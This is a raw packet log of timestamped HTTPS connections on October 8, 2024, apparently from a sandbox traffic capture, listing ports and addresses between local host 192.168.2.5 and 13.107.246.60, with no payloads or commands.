Oct 8, 2024 20:47:13.929418087 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.929538965 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.930538893 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.930579901 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.930639982 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.930644989 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.930682898 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.930696964 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.022701025 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.022747040 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.022846937 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.022847891 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.022862911 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.022928953 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.023519039 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.023562908 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.023611069 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.023616076 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.023655891 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.023655891 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.024277925 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.024319887 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.024355888 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.024362087 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.024389029 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.024507046 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.025033951 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.025075912 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.025105000 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.025109053 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.025134087 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.025172949 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.025631905 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.025746107 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.025748968 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.025774956 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.068176031 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.068203926 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.068517923 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.071919918 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.071933031 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.072828054 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.072916031 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.073041916 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.073340893 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.073378086 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.074687004 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.074711084 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.074875116 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.074918985 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.074930906 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.075145960 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.075366020 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.075402975 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.075525999 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.075603962 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.075617075 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.075628042 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.076374054 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.076374054 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.076442003 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.231448889 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.231511116 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.786676884 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.786823988 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.787236929 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.787269115 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.787286043 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.787297010 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.787780046 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.787786007 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.787904024 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.787909031 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.790415049 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.790817976 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.790843010 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.791297913 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.791309118 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.791549921 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.791836977 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.791846037 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.792233944 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.792239904 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.795006037 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.795475960 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.795500040 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.795804024 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.795811892 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955096006 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955148935 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955224037 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955246925 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955298901 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955351114 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955465078 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955466986 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955466986 CEST	49726	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955488920 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955499887 CEST	443	49726	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955526114 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955575943 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955667973 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955672026 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.955681086 CEST	49725	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.955684900 CEST	443	49725	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.959331036 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.959341049 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.959374905 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.959433079 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.959443092 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.959494114 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.959830046 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.959846973 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.959916115 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.959930897 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.961891890 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.961906910 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.962007046 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.962021112 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.962100983 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.962210894 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.962212086 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.962217093 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.962344885 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.962366104 CEST	443	49727	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.962418079 CEST	49727	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.964251041 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.964276075 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.965006113 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.965006113 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.965028048 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.983695984 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.985047102 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.985110044 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.986026049 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.986037016 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:14.986048937 CEST	49728	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:14.986052990 CEST	443	49728	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.003789902 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.003856897 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.003941059 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.004245043 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.004256964 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.104384899 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.104439020 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.104581118 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.104588985 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.104940891 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.105175972 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.105175972 CEST	49724	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.105191946 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.105201006 CEST	443	49724	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.109632015 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.109659910 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.109762907 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.110377073 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.110387087 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.799482107 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.800472975 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.800472975 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.800488949 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.800503969 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.956182957 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.958967924 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.958980083 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.959963083 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.959968090 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.971611977 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.976672888 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.976713896 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.977365017 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.977379084 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.980307102 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.981241941 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.981242895 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.981313944 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.981338978 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.987117052 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.987282991 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.989250898 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.994246960 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.994260073 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:15.994328976 CEST	49731	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:15.994333982 CEST	443	49731	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.011765957 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.011790991 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.011940956 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.013139009 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.013150930 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.065928936 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.066061020 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.066229105 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.066401958 CEST	49732	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.066411018 CEST	443	49732	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.071146965 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.071238995 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.071811914 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.072211027 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.072248936 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.077568054 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.077634096 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.078196049 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.078414917 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.078416109 CEST	49733	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.078448057 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.078470945 CEST	443	49733	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.081990004 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.082011938 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.082237005 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.082428932 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.082442045 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.089031935 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.089091063 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.089365959 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.089365959 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.089440107 CEST	49730	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.089473009 CEST	443	49730	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.097194910 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.097201109 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.097871065 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.098423958 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.098440886 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.161973953 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.217283964 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.221003056 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.221024036 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.221632957 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.221643925 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.320461035 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.320606947 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.320684910 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.410434008 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.410434008 CEST	49734	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.410475016 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.410497904 CEST	443	49734	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.418492079 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.418591976 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.418689966 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.419157028 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.419193983 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.708100080 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.708738089 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.708766937 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:16.709244967 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:16.709252119 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.053565979 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.054943085 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.054970026 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.055133104 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.056018114 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.056025028 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.056921959 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.057662010 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.057722092 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.058433056 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.058456898 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.060419083 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.060453892 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.061000109 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.061009884 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.139856100 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.140129089 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.140228987 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.140558958 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.140585899 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.140747070 CEST	49735	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.140757084 CEST	443	49735	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.144664049 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.144752026 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.144854069 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.145061016 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.145087004 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.156452894 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.156611919 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.156938076 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.156938076 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.156938076 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.158003092 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.158061981 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.158220053 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.158405066 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.158420086 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.158432007 CEST	49737	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.158436060 CEST	443	49737	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.160268068 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.160330057 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.160381079 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.161108017 CEST	49738	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.161119938 CEST	443	49738	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.164223909 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.164273024 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.164355040 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.164480925 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.164498091 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.165348053 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.165368080 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.165443897 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.165888071 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.165905952 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.166744947 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.166758060 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.166837931 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.166975975 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.166987896 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.248703957 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.252434969 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.252494097 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.252872944 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.252887011 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.351950884 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.352026939 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.352493048 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.352720976 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.352745056 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.352757931 CEST	49739	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.352766037 CEST	443	49739	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.355972052 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.356012106 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.356462955 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.356620073 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.356637001 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.467339039 CEST	49736	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.467401981 CEST	443	49736	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.777765036 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.778492928 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.778518915 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.778924942 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.778932095 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.794217110 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.794651985 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.794718981 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.795226097 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.795239925 CEST	443	49741	13.107.246.60	192.168.2.5
